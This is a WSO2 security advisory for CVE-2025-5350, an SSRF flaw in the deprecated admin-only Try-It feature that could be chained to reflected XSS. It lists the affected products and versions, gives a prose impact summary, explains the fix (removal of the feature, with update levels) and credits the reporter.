Security Advisory WSO2-2025-4124/CVE-2025-5350¶
Published: 2025-10-24
Version: 1.0.0
Severity: Medium
CVSS Score: 5.9 (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L)
CVE IDs: CVE-2025-5350
AFFECTED PRODUCTS¶
- WSO2 API Control Plane: 4.5.0
- WSO2 API Manager: 4.5.0, 4.4.0, 4.3.0, 4.2.0, 4.1.0, 4.0.0, 3.2.1, 3.2.0, 3.1.0
- WSO2 Enterprise Integrator: 6.6.0
- WSO2 Identity Server as Key Manager: 5.10.0
- WSO2 Identity Server: 7.1.0, 7.0.0, 6.1.0, 6.0.0, 5.11.0, 5.10.0
- WSO2 Open Banking AM: 2.0.0
- WSO2 Open Banking IAM: 2.0.0
- WSO2 Traffic Manager: 4.5.0
- WSO2 Universal Gateway: 4.5.0
OVERVIEW¶
The deprecated Try-It feature has been removed to address a SSRF vulnerability that could be chained to a XSS flow.
DESCRIPTION¶
The legacy Try-It feature which was accessible only to users with administrative privileges, accepted user supplied URLs without validation. This could result in potential Server-Side Request Forgery (SSRF). Since the retrieved content is incorporated directly into HTML responses, this could also be used in performing a reflected cross-site scripting within the admin user’s browser context.
IMPACT¶
Combined SSRF & XSS: By tricking an administrator into accessing a crafted URL, an attacker can force the server to fetch malicious content, which is then reflected in the user’s browser allowing arbitrary script execution to modify the UI or exfiltrate data.
Note that session cookies are protected with the HttpOnly flag, mitigating direct session hijacking.
Internal Service Enumeration: If a malicious actor with administrative privileges visits a specially crafted link, SSRF may be used to query non-public endpoints reachable to the WSO2 product deployment, aiding in mapping internal network resources.
SOLUTION¶
This release improves product security by removing the Try-It feature, the root cause of SSRF and XSS vulnerabilities, reducing the attack surface.
Community Users (Open Source)¶
Apply the relevant fixes to your product using the public fix(es) provided below.
If applying the fix or update is not feasible, migrate to the latest unaffected version of the respective WSO2 product(s).
Support Subscription Holders¶
Update your product to the specified update level—or a higher update level—to apply the fix.
Info
WSO2 Support Subscription Holders may use WSO2 Updates in order to apply the fix.
| Product Name | Product Version | Update Level |
|---|---|---|
| WSO2 API Control Plane | 4.5.0 | 7 |
| WSO2 API Manager | 4.5.0 | 7 |
| WSO2 API Manager | 4.4.0 | 23 |
| WSO2 API Manager | 4.3.0 | 60 |
| WSO2 API Manager | 4.2.0 | 147 |
| WSO2 API Manager | 4.1.0 | 209 |
| WSO2 API Manager | 4.0.0 | 369 |
| WSO2 API Manager | 3.2.1 | 47 |
| WSO2 API Manager | 3.2.0 | 428 |
| WSO2 API Manager | 3.1.0 | 332 |
| WSO2 Enterprise Integrator | 6.6.0 | 218 |
| WSO2 Identity Server | 7.1.0 | 27 |
| WSO2 Identity Server | 7.0.0 | 120 |
| WSO2 Identity Server | 6.1.0 | 245 |
| WSO2 Identity Server | 6.0.0 | 246 |
| WSO2 Identity Server | 5.11.0 | 415 |
| WSO2 Identity Server | 5.10.0 | 359 |
| WSO2 Identity Server as Key Manager | 5.10.0 | 352 |
| WSO2 Open Banking AM | 2.0.0 | 380 |
| WSO2 Open Banking IAM | 2.0.0 | 401 |
| WSO2 Traffic Manager | 4.5.0 | 7 |
| WSO2 Universal Gateway | 4.5.0 | 7 |
CREDITS¶
WSO2 thanks, Noël MACCARY for responsibly reporting the identified issue and working with us as we addressed it.